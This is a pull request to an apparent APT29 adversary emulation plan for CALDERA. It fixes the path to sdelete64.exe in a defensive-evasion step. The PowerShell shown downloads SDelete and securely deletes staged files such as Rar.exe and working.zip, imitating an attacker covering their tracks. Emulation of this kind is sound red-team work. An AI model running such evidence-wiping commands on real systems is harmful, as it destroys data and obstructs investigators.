### PR TITLE
Fix incorrect sdelete path

### DIFF
--- a/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/208b021b-c79a-4176-8ad1-3af99ed50c6f.yml
+++ b/adversary_emulation/APT29/CALDERA_DIY/evals/data/abilities/defensive-evasion/208b021b-c79a-4176-8ad1-3af99ed50c6f.yml
@@ -21,7 +21,7 @@
             iwr -uri "https://download.sysinternals.com/files/SDelete.zip" -outfile sdelete64.zip;
             Expand-Archive sdelete64.zip -force;
           }
-          copy sdelete64\sdelete64.exe C:\Windows\Temp\;
+          copy sdelete64.exe C:\Windows\Temp\;
           cd C:\Windows\Temp\ ;
           .\sdelete64.exe /accepteula C:\Windows\Temp\Rar.exe;
           .\sdelete64.exe /accepteula C:\Users\#{profile_user}\AppData\Roaming\working.zip;


### PR DESCRIPTION
The sdelete64.exe binary extracted from
https://download.sysinternals.com/files/SDelete.zip is currently
sdelete64.exe rather than sdelete64\sdelete64.exe